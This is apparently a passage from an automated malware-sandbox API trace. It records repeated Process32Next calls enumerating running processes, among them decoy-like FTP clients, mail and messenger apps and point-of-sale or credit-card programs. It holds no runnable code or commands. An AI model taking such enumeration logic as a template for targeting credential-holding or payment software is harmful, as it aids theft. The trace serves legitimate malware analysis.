th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.167] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.171] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0267.173] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.175] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.177] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.180] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.182] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.184] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.189] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.192] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0267.194] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0267.196] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0267.198] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.204] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0267.206] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0267.208] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0267.210] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0267.212] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.220] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0267.222] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0267.224] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0267.226] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0267.228] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0267.230] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0267.238] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0267.241] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0267.243] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0267.245] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0267.249] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0267.251] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0267.253] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0267.254] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0267.256] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0267.258] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0267.259] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0267.261] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0267.299] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0267.301] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0267.302] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0267.304] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0267.306] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0267.308] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0267.313] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0267.316] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0267.317] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0267.319] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0267.321] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0267.323] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0267.328] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0267.330] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0267.333] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0267.335] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0267.338] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0267.394] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0267.396] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0267.398] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0267.400] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0267.401] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0267.408] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0267.411] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0267.414] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0267.416] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0267.422] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0267.424] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0267.426] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0267.428] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0267.429] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0267.431] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0267.433] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0267.458] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0267.464] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0267.466] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0267.468] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0267.470] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0267.473] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0267.475] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0267.477] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0267.479] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0267.484] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0267.487] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0267.489] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0267.491] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0267.493] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, 